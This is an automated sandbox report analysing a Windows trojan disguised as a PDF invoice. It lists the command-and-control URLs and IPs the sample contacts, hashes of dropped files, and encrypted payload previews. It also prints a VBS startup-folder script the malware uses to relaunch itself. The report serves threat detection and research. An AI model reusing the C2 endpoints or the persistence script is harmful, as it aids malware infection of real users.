                            http://www.vpnto.net/s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0dtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carsten.studio/bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0dtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.moumore.top/cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0dtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.vpnto.net/s8dp/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sitioseguro.blog/6o0x/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.moumore.top/cdzk/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tempatmudisini06.click/5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8=false
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ac.ecosia.org/autocomplete?q=upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtabupnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoupnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sitioseguro.blogXzXxPWzavnqD.exe, 0000000B.00000002.3083758728.0000000002AF6000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchupnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssupnpcont.exe, 0000000A.00000002.3085844190.00000000039E8000.00000004.10000000.00040000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.0000000003788000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.ecosia.org/newtab/upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=upnpcont.exe, 0000000A.00000003.2517832127.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.strato.deXzXxPWzavnqD.exe, 0000000B.00000002.3084807693.00000000035F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  103.21.221.4
                                                  		tempatmudisini06.clickunknown
                                                  		9905LINKNET-ID-APLinknetASNIDfalse
                                                  104.21.15.100
                                                  		www.sitioseguro.blogUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  217.160.0.200
                                                  		carsten.studioGermany
                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                  203.161.46.205
                                                  		www.moumore.topMalaysia
                                                  		45899VNPT-AS-VNVNPTCorpVNtrue
                                                  91.226.30.3
                                                  		www.vpnto.netRussian Federation
                                                  		56601I7-ASRUtrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1558148
                                                  Start date and time:2024-11-19 03:54:05 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 36s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:5674656777985-069688574654 pdf.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@14/7@5/5
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 53
                                                  • Number of non-executed functions: 300
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  02:55:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs
                                                  21:56:38API Interceptor769094x Sleep call for process: upnpcont.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  103.21.221.4FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                  • www.tempatmudisini06.click/kfzf/
                                                  Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                  • www.tempatmudisini01.click/abla/
                                                  -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                  • www.tempatmudisini01.click/iydt/
                                                  UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.tempatmudisini01.click/iydt/
                                                  RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                  • www.tempatmudisini01.click/abla/
                                                  Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                  • www.tempatmudisini01.click/phdl/
                                                  ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                  • www.tempatmudisini01.click/lybf/
                                                  SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                  • www.tempatmudisini01.click/r9rj/
                                                  SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                  • www.tempatmudisini01.click/abla/
                                                  217.160.0.200PO-3170012466.exeGet hashmaliciousFormBookBrowse
                                                  • www.dukesribbar.com/bbk4/?h0DhlHu=f2IIPTVxZMpXMJMuzfnk2NWDEb+JwK8g816o2ZnROlKngCQ4rxAc1D8js0OmEx/F+OtZ&tXi0=MXbP9
                                                  203.161.46.205Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.startvin.top/chrv/
                                                  PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                  • www.nimil.info/gdpp/
                                                  Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                  • www.ecojomos.xyz/uaef/
                                                  ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.bullbord.top/veti/
                                                  Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.bullbord.top/veti/
                                                  #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.bullbord.top/veti/
                                                  Request for Quotation + sample catalog.vbsGet hashmaliciousFormBookBrowse
                                                  • www.bullbord.top/veti/
                                                  Payment Swift-67654.pdf.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.jucicty.xyz/8u8r/
                                                  Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.bullbord.top/veti/
                                                  Payment Advice - Advice Ref[BIBBC2023189].exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.jucicty.xyz/8u8r/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ONEANDONE-ASBrauerstrasse48DEajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                  • 82.165.206.196
                                                  https://www.fc-pruem.de/readme/Get hashmaliciousUnknownBrowse
                                                  • 217.160.0.97
                                                  PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                  • 217.76.156.252
                                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 104.192.6.97
                                                  wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.231
                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.60
                                                  mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                  • 87.106.46.107
                                                  75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                  • 87.106.46.107
                                                  New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.220
                                                  Digiturk.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 217.160.0.3
                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.188.199
                                                  rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  • 104.21.85.146
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 188.114.96.3
                                                  https://gamesnewhere.s3.us-west-2.amazonaws.com/rere.htmlGet hashmaliciousPhisherBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • 188.114.96.3
                                                  1Sj5F6P4nv.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                  • 104.26.12.205
                                                  https://website-70396.convertflowpages.com/firstmarkinsuranceGet hashmaliciousHTMLPhisherBrowse
                                                  • 162.247.243.39
                                                  LINKNET-ID-APLinknetASNIDowari.ppc.elfGet hashmaliciousUnknownBrowse
                                                  • 139.65.64.42
                                                  dvwkja7.elfGet hashmaliciousMiraiBrowse
                                                  • 139.255.236.143
                                                  FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                  • 103.21.221.4
                                                  amen.arm6.elfGet hashmaliciousMiraiBrowse
                                                  • 139.255.236.186
                                                  amen.m68k.elfGet hashmaliciousUnknownBrowse
                                                  • 139.43.9.147
                                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                                  • 139.255.236.186
                                                  byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 139.25.197.11
                                                  wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                  • 139.44.166.66
                                                  jew.spc.elfGet hashmaliciousMiraiBrowse
                                                  • 139.40.24.226
                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                  • 139.33.31.27
                                                  VNPT-AS-VNVNPTCorpVNMV KODCO.exeGet hashmaliciousFormBookBrowse
                                                  • 203.161.49.193
                                                  PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                  • 203.161.49.193
                                                  Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 203.161.46.205
                                                  Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 203.161.49.193
                                                  protected.ps1Get hashmaliciousUnknownBrowse
                                                  • 202.92.4.57
                                                  PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                  • 203.161.49.193
                                                  yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                  • 14.186.221.243
                                                  yakuza.ppc.elfGet hashmaliciousMiraiBrowse
                                                  • 14.248.237.190
                                                  http://weststoneltd.technolutionszzzz.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                  • 203.161.41.21
                                                  x86.elfGet hashmaliciousUnknownBrowse
                                                  • 113.189.0.97

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\816G58k15

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\upnpcont.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):114688
                                                  Entropy (8bit):0.9746603542602881
                                                  Encrypted:false
                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\aut1D34.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.993561572512903
                                                  Encrypted:true
                                                  SSDEEP:6144:iL5hjD14lB5X+VyqzglJe8o3W1wjm5f6WjqNwDlY:SfgBezye8om1wa5e6RY
                                                  MD5:DFAA91FD5C9660FB823F58C6A0B9DFD8
                                                  SHA1:22D8A197E5DCB0B6492B5A4544F97A55F07A9634
                                                  SHA-256:FFEFC8FE626402DA1A4FD8D7D48713E533F0D4EDB6ACD4852773DD0823A310D9
                                                  SHA-512:67A5536588B785C2BF431150B1627D479C6B48D748617C955B489C3826CADE93901620BCA192742A4A3BC8108BBB3C24395C28B3CE4400F6CBD1EA47B8535B74
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.n.OS75CEF49..VF.1VBO49O.75CAF49LLVF91VBO49OP75CAF49LLVF91VB.49O^(.MA.=.m.W....*&G.?"XR1 +.Z-"8)M.4'oFL!p^[c..g.!#2#.<[Hk49OP75C8G=.q,1..Q1.rT^.J...{&S.V....Q1.U...lWR../WQq,1.91VBO49O.r5C.G59P.F'91VBO49O.77BJG?9L.RF91VBO49O.$5CAV49L<RF91.BO$9OP55CGF49LLVF?1VBO49OPG1CAD49LLVF;1..O4)OP'5CAF$9L\VF91VB_49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49b83>M1VB.l=OP'5CA.09L\VF91VBO49OP75CaF4YLLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VB

                                                  C:\Users\user\AppData\Local\Temp\autE4DE.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.993561572512903
                                                  Encrypted:true
                                                  SSDEEP:6144:iL5hjD14lB5X+VyqzglJe8o3W1wjm5f6WjqNwDlY:SfgBezye8om1wa5e6RY
                                                  MD5:DFAA91FD5C9660FB823F58C6A0B9DFD8
                                                  SHA1:22D8A197E5DCB0B6492B5A4544F97A55F07A9634
                                                  SHA-256:FFEFC8FE626402DA1A4FD8D7D48713E533F0D4EDB6ACD4852773DD0823A310D9
                                                  SHA-512:67A5536588B785C2BF431150B1627D479C6B48D748617C955B489C3826CADE93901620BCA192742A4A3BC8108BBB3C24395C28B3CE4400F6CBD1EA47B8535B74
                                                  Malicious:false
                                                  Preview:.n.OS75CEF49..VF.1VBO49O.75CAF49LLVF91VBO49OP75CAF49LLVF91VB.49O^(.MA.=.m.W....*&G.?"XR1 +.Z-"8)M.4'oFL!p^[c..g.!#2#.<[Hk49OP75C8G=.q,1..Q1.rT^.J...{&S.V....Q1.U...lWR../WQq,1.91VBO49O.r5C.G59P.F'91VBO49O.77BJG?9L.RF91VBO49O.$5CAV49L<RF91.BO$9OP55CGF49LLVF?1VBO49OPG1CAD49LLVF;1..O4)OP'5CAF$9L\VF91VB_49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49b83>M1VB.l=OP'5CA.09L\VF91VBO49OP75CaF4YLLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VB

                                                  C:\Users\user\AppData\Local\Temp\autEDF6.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.993561572512903
                                                  Encrypted:true
                                                  SSDEEP:6144:iL5hjD14lB5X+VyqzglJe8o3W1wjm5f6WjqNwDlY:SfgBezye8om1wa5e6RY
                                                  MD5:DFAA91FD5C9660FB823F58C6A0B9DFD8
                                                  SHA1:22D8A197E5DCB0B6492B5A4544F97A55F07A9634
                                                  SHA-256:FFEFC8FE626402DA1A4FD8D7D48713E533F0D4EDB6ACD4852773DD0823A310D9
                                                  SHA-512:67A5536588B785C2BF431150B1627D479C6B48D748617C955B489C3826CADE93901620BCA192742A4A3BC8108BBB3C24395C28B3CE4400F6CBD1EA47B8535B74
                                                  Malicious:false
                                                  Preview:.n.OS75CEF49..VF.1VBO49O.75CAF49LLVF91VBO49OP75CAF49LLVF91VB.49O^(.MA.=.m.W....*&G.?"XR1 +.Z-"8)M.4'oFL!p^[c..g.!#2#.<[Hk49OP75C8G=.q,1..Q1.rT^.J...{&S.V....Q1.U...lWR../WQq,1.91VBO49O.r5C.G59P.F'91VBO49O.77BJG?9L.RF91VBO49O.$5CAV49L<RF91.BO$9OP55CGF49LLVF?1VBO49OPG1CAD49LLVF;1..O4)OP'5CAF$9L\VF91VB_49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49b83>M1VB.l=OP'5CA.09L\VF91VBO49OP75CaF4YLLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VB

                                                  C:\Users\user\AppData\Local\Temp\piceworth

                                                  Download File
                                                  Process:C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.993561572512903
                                                  Encrypted:true
                                                  SSDEEP:6144:iL5hjD14lB5X+VyqzglJe8o3W1wjm5f6WjqNwDlY:SfgBezye8om1wa5e6RY
                                                  MD5:DFAA91FD5C9660FB823F58C6A0B9DFD8
                                                  SHA1:22D8A197E5DCB0B6492B5A4544F97A55F07A9634
                                                  SHA-256:FFEFC8FE626402DA1A4FD8D7D48713E533F0D4EDB6ACD4852773DD0823A310D9
                                                  SHA-512:67A5536588B785C2BF431150B1627D479C6B48D748617C955B489C3826CADE93901620BCA192742A4A3BC8108BBB3C24395C28B3CE4400F6CBD1EA47B8535B74
                                                  Malicious:false
                                                  Preview:.n.OS75CEF49..VF.1VBO49O.75CAF49LLVF91VBO49OP75CAF49LLVF91VB.49O^(.MA.=.m.W....*&G.?"XR1 +.Z-"8)M.4'oFL!p^[c..g.!#2#.<[Hk49OP75C8G=.q,1..Q1.rT^.J...{&S.V....Q1.U...lWR../WQq,1.91VBO49O.r5C.G59P.F'91VBO49O.77BJG?9L.RF91VBO49O.$5CAV49L<RF91.BO$9OP55CGF49LLVF?1VBO49OPG1CAD49LLVF;1..O4)OP'5CAF$9L\VF91VB_49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49b83>M1VB.l=OP'5CA.09L\VF91VBO49OP75CaF4YLLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VBO49OP75CAF49LLVF91VB

                                                  C:\Users\user\AppData\Local\retrofit\cunila.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1189888
                                                  Entropy (8bit):7.164870375096438
                                                  Encrypted:false
                                                  SSDEEP:24576:Mtb20pkaCqT5TBWgNQ7au7/cTDUaoFGXMt4V0WB6A:1Vg5tQ7au7UTnMs5
                                                  MD5:8E38E2141423C1BDF6899EF2AAF078F8
                                                  SHA1:ECAA7E2BD0E59981891F6EC4C34C67EE32843D2D
                                                  SHA-256:FF964E11539853B46A4D4C0F9BBD111F4FDCE259EF470E88AE59802D82533B36
                                                  SHA-512:F1AA198ECFA67B35380867C4552A5E5EEDFB3A67E49EF121C2DE9A10BD8B00002CA15C66D90B89F20746FF8755CD2444B46CC5ADE521D15020B21E8D686E5803
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L...535g.........."..........n......t_............@.......................................@...@.......@......................p..|....@..........................Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc..t...........................@..B................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):270
                                                  Entropy (8bit):3.400605751158446
                                                  Encrypted:false
                                                  SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1q/NDQMnriIM8lfQVn:DsO+vNloRKQ1qFDQKmA2n
                                                  MD5:AE125A76B27EA014BDE1074A281B3482
                                                  SHA1:3C72BDF8164875C5A81A1D9B3B3429D5B947BFA3
                                                  SHA-256:C902128E212154F39AEA5F539416BE13757E69656FFEB87D5CC995513DB2531D
                                                  SHA-512:379C09BF3411A573869E4AAF6C1BC559C7F1434066B9EE0CAF5CAA02A5986539284EA72A39BCCD32B20BB07A8C40A01C2C639C4732871ECDE04CF23A2E68A418
                                                  Malicious:true
                                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.r.e.t.r.o.f.i.t.\.c.u.n.i.l.a...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.164870375096438
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:5674656777985-069688574654 pdf.exe
                                                  File size:1'189'888 bytes
                                                  MD5:8e38e2141423c1bdf6899ef2aaf078f8
                                                  SHA1:ecaa7e2bd0e59981891f6ec4c34c67ee32843d2d
                                                  SHA256:ff964e11539853b46a4d4c0f9bbd111f4fdce259ef470e88ae59802d82533b36
